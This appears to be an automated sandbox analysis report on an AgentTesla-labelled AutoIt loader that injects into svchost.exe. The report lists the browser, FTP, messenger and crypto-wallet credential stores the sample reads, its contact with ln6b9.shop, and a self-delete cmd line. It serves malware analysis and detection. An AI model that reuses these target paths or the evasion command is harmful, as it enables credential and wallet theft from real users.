            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\freebl3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\nssdbm3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeAPI coverage: 4.0 %
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_007EDBBE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F68EE FindFirstFileW,FindClose,0_2_007F68EE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_007F698F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED076
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED3A9
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F9642
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F979D
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_007F9B2B
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_007F5C97
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,1_2_004098A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D0A0 FindFirstFileW,1_2_0040D0A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,1_2_004087DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D06E FindFirstFileW,1_2_0040D06E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose,1_2_0041303C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose,1_2_0040989F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,1_2_004111C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose,1_2_0041158C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose,1_2_00411590
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,1_2_00412D9C
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: svchost.exe, 00000001.00000002.1814289197.000000000365F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 00000001.00000002.1813546210.0000000003631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: svchost.exe, 00000001.00000002.1814354136.0000000003679000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]NativeFontCtl H
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FEAA2 BlockInput,0_2_007FEAA2
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007B2622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,GetCurrentProcessId,1_2_00416B94
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A4CE8 mov eax, dword ptr fs:[00000030h]0_2_007A4CE8
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_01E434E0 mov eax, dword ptr fs:[00000030h]0_2_01E434E0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_01E43480 mov eax, dword ptr fs:[00000030h]0_2_01E43480
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_01E41E70 mov eax, dword ptr fs:[00000030h]0_2_01E41E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407A34 mov eax, dword ptr fs:[00000030h]1_2_00407A34
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_007E0B62
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007B2622
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007A083F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A09D5 SetUnhandledExceptionFilter,0_2_007A09D5
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007A0C21

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 172.67.128.117 80
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 30F6008
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007E1201
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007C2BA5
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EB226 SendInput,keybd_event,0_2_007EB226
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_008022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_008022DA
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cJX8BV8LYG.exe"
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_007E0B62
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007E1663
            Source: cJX8BV8LYG.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: cJX8BV8LYG.exeBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A0698 cpuid 0_2_007A0698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,1_2_00416FB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,1_2_00404B4C
            Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_007F8195
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007DD27A GetUserNameW,0_2_007DD27A
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007BBB6F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1816856617.0000000006C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: cJX8BV8LYG.exe PID: 5016, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: svchost.exe PID: 4940, type: MEMORYSTR
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: electrum.dat
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus Eden\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus Eden\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_81
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_XP
            Source: cJX8BV8LYG.exe | Binary or memory string: WIN_XPe
            Source: cJX8BV8LYG.exe | Binary or memory string: WIN_VISTA
            Source: cJX8BV8LYG.exe | Binary or memory string: WIN_7
            Source: cJX8BV8LYG.exe | Binary or memory string: WIN_8
            Source: Yara match | File source: 1.2.svchost.exe.684a82d.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.68b5f7e.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.6828840.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4940, type: MEMORYSTR
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_00801204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00801204
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_00801806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00801806
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 2 Obfuscated Files or Information | 2 Credentials in Registry | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 Timestomp | 1 Credentials In Files | 147 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 312 Process Injection | 1 DLL Side-Loading | LSA Secrets | 231 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            Behavior Graph (ID: 1501450, Sample: cJX8BV8LYG.exe, Startdate: 29/08/2024, Architecture: WINDOWS, Score: 100)
            • Sample: contacts ln6b9.shop. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
            • cJX8BV8LYG.exe (started). Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
            • svchost.exe (started by cJX8BV8LYG.exe). DNS/IP: ln6b9.shop 172.67.128.117, 49730, 49731, 80 CLOUDFLARENETUS United States. Dropped: C:\Users\user\AppData\...\vcruntime140.dll, PE32; C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32; C:\Users\user\AppData\Local\...\softokn3.dll, PE32; 45 other files (none is malicious). Signatures: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Instant Messenger accounts or passwords; 6 other signatures
            • cmd.exe (started by svchost.exe)
            • conhost.exe (started by cmd.exe)
            • timeout.exe (started by cmd.exe)

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| cJX8BV8LYG.exe | 68% | ReversingLabs | Win32.Trojan.AgentTesla | |
| cJX8BV8LYG.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-environment-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-filesystem-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-heap-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-locale-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-math-l1-1-0.dll | 0% | ReversingLabs | | |
